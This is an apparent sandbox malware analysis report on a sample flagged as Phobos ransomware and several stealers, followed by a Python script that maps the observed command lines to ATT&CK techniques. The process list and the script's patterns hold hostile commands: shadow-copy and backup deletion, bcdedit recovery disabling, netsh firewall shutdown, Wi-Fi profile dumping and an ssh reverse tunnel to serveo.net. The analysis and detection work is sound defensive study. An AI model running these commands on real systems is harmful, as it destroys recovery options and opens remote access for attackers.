Malware Analysis Report

2024-10-16 05:11

Sample ID 230923-zmn2msad3y
Target 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
SHA256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
Tags
ammyyadmin flawedammyy phemedrone phobos rhadamanthys smokeloader backdoor collection evasion persistence ransomware rat spyware stealer trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256

65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636

Threat Level: Known bad

The file 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636 was found to be: Known bad.

Malicious Activity Summary

AmmyyAdmin payload

Rhadamanthys

Ammyy Admin

SmokeLoader

Detect rhadamanthys stealer shellcode

Phobos

FlawedAmmyy RAT

Phemedrone

Suspicious use of NtCreateUserProcessOtherParentProcess

Deletes shadow copies

Modifies boot configuration data using bcdedit

Renames multiple (251) files with added filename extension

Downloads MZ/PE file

Modifies Windows Firewall

Deletes backup catalog

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Checks computer location settings

Accesses Microsoft Outlook profiles

Adds Run key to start application

Looks up external IP address via web service

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

outlook_win_path

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

outlook_office_path

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 20:50

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 20:50

Reported

2023-09-23 20:52

Platform

win10v2004-20230915-en

Max time kernel

78s

Max time network

131s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Detect rhadamanthys stealer shellcode

FlawedAmmyy RAT

trojan flawedammyy

Phemedrone

stealer phemedrone

Phobos

ransomware phobos

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4256 created 3196 N/A C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (251) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\781D.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\75DA.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\system32\certreq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\certreq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\certreq.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1508 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 1516 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
PID 3548 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe C:\Windows\system32\cmd.exe
PID 4736 wrote to memory of 3320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4736 wrote to memory of 3320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2880 wrote to memory of 3740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2880 wrote to memory of 3740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2880 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2880 wrote to memory of 3716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4736 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4736 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2880 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 2516 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2880 wrote to memory of 276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2880 wrote to memory of 276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 3196 wrote to memory of 3756 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E45.exe
PID 3196 wrote to memory of 3756 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E45.exe
PID 3196 wrote to memory of 3756 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6E45.exe
PID 3196 wrote to memory of 1080 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\705A.exe
PID 3196 wrote to memory of 1080 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\705A.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

"C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe"

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

"C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe"

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\705A.exe

C:\Users\Admin\AppData\Local\Temp\705A.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\75DA.exe

C:\Users\Admin\AppData\Local\Temp\75DA.exe

C:\Users\Admin\AppData\Local\Temp\73A6.exe

C:\Users\Admin\AppData\Local\Temp\73A6.exe

C:\Users\Admin\AppData\Local\Temp\781D.exe

C:\Users\Admin\AppData\Local\Temp\781D.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\6E45.exe

C:\Users\Admin\AppData\Local\Temp\8405.exe

C:\Users\Admin\AppData\Local\Temp\8405.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\Ynigope.exe

"C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"

C:\Users\Admin\AppData\Local\Temp\Ynigope.exe

"C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 548 -ip 548

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1968

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\705A.exe

"C:\Users\Admin\AppData\Local\Temp\705A.exe"

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profiles

C:\Windows\SysWOW64\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 548 -ip 548

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2936 serveo.net

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1988

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe -debug

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\C176.tmp\aa_nts.dll",run
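Taken one at a time, most of the command lines above are things an administrator might run; the ransomware signal is that the shadow-copy deletion, both bcdedit changes, the backup-catalog deletion and the two firewall changes all descend from one process (n6)ZqKc3{.exe, pid 3548), while the Wi-Fi profile dump and the ssh reverse tunnel to serveo.net sit in the stealer's tree. The Python below is an added example, not part of the sandbox report: it correlates constructed Sysmon-style process-creation events (command lines copied from this Processes section; the parent links of the 705A.exe subtree are an assumption, since the report does not show who launched those children) into one finding per process tree, tagged with the ATT&CK technique IDs the rules map to.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (pid, ppid, image,
# cmdline). The command lines are copied from the report's Processes section and
# the pid/ppid links of the n6)ZqKc3{.exe subtree follow its "wrote to memory of"
# rows. The two children of 705A.exe (pids 9001 and 9002) are an ASSUMPTION of
# this example: the report does not show which process launched them.
EVENTS = [
    {"pid": 1508, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"'},
    {"pid": 3548, "ppid": 1508, "image": r"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe",
     "cmdline": r"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"},
    {"pid": 2880, "ppid": 3548, "image": r"C:\Windows\system32\cmd.exe", "cmdline": r'"C:\Windows\system32\cmd.exe"'},
    {"pid": 4736, "ppid": 3548, "image": r"C:\Windows\system32\cmd.exe", "cmdline": r'"C:\Windows\system32\cmd.exe"'},
    {"pid": 3740, "ppid": 2880, "image": r"C:\Windows\system32\vssadmin.exe", "cmdline": "vssadmin delete shadows /all /quiet"},
    {"pid": 3716, "ppid": 2880, "image": r"C:\Windows\System32\Wbem\WMIC.exe", "cmdline": "wmic shadowcopy delete"},
    {"pid": 2516, "ppid": 2880, "image": r"C:\Windows\system32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 1348, "ppid": 2880, "image": r"C:\Windows\system32\bcdedit.exe", "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"pid": 276, "ppid": 2880, "image": r"C:\Windows\system32\wbadmin.exe", "cmdline": "wbadmin delete catalog -quiet"},
    {"pid": 3320, "ppid": 4736, "image": r"C:\Windows\system32\netsh.exe", "cmdline": "netsh advfirewall set currentprofile state off"},
    {"pid": 4392, "ppid": 4736, "image": r"C:\Windows\system32\netsh.exe", "cmdline": "netsh firewall set opmode mode=disable"},
    {"pid": 1080, "ppid": 3196, "image": r"C:\Users\Admin\AppData\Local\Temp\705A.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\705A.exe"'},
    {"pid": 9001, "ppid": 1080, "image": r"C:\Windows\SysWOW64\cmd.exe",  # parent link assumed
     "cmdline": r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'},
    {"pid": 9002, "ppid": 1080, "image": r"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe",  # parent link assumed
     "cmdline": r'"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2936 serveo.net'},
]

# (ATT&CK technique id, name, pattern). Each pattern targets one of the command
# lines seen in the report; the bcdedit rule covers both of its invocations.
RULES = [
    ("T1490", "Inhibit System Recovery", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("T1490", "Inhibit System Recovery", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("T1490", "Inhibit System Recovery", re.compile(
        r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("T1490", "Inhibit System Recovery", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("T1562.004", "Disable or Modify System Firewall", re.compile(
        r"netsh(\.exe)?\s+(advfirewall\s+set\s+\w+\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
    ("T1572", "Protocol Tunneling", re.compile(r"\bssh(\.exe)?\b.*\s-R\s+\d+:", re.I)),
    ("T1016", "System Network Configuration Discovery",
     re.compile(r"netsh(\.exe)?\s+wlan\s+show\s+(profiles|networks)", re.I)),
]


def match_rules(cmdline):
    """Return the (technique_id, name) pairs whose pattern matches one command line."""
    return [(tid, name) for tid, name, rx in RULES if rx.search(cmdline)]


def verdict(tree):
    """Several distinct recovery-inhibition commands under one root is the
    pre-encryption pattern of Phobos-style ransomware; a lone vssadmin call is not."""
    if tree["t1490_count"] >= 3:
        return "ransomware-recovery-inhibition"
    if "T1572" in tree["techniques"]:
        return "reverse-tunnel"
    return "suspicious" if tree["techniques"] else "clean"


def analyse(events):
    """Group rule hits by the root ancestor of each process; returns {root_pid: summary}."""
    by_pid = {e["pid"]: e for e in events}

    def root_of(pid):
        # Walk up until the parent is unknown to us (the sandbox-spawned root).
        while by_pid[pid]["ppid"] in by_pid:
            pid = by_pid[pid]["ppid"]
        return pid

    trees = {}
    for e in events:
        hits = match_rules(e["cmdline"])
        if not hits:
            continue
        root = root_of(e["pid"])
        tree = trees.setdefault(root, {"root_image": by_pid[root]["image"], "techniques": set(),
                                       "t1490_count": 0, "hits": []})
        for tid, _name in hits:
            tree["techniques"].add(tid)
            if tid == "T1490":
                tree["t1490_count"] += 1
            tree["hits"].append((e["pid"], tid, e["cmdline"]))
    for tree in trees.values():
        tree["techniques"] = sorted(tree["techniques"])
        tree["verdict"] = verdict(tree)
    return trees


if __name__ == "__main__":
    for root, tree in analyse(EVENTS).items():
        print(f"root pid {root} ({tree['root_image']}): {tree['verdict']}; techniques {tree['techniques']}")
        for pid, tid, cmd in tree["hits"]:
            print(f"    pid {pid} {tid}: {cmd}")
```

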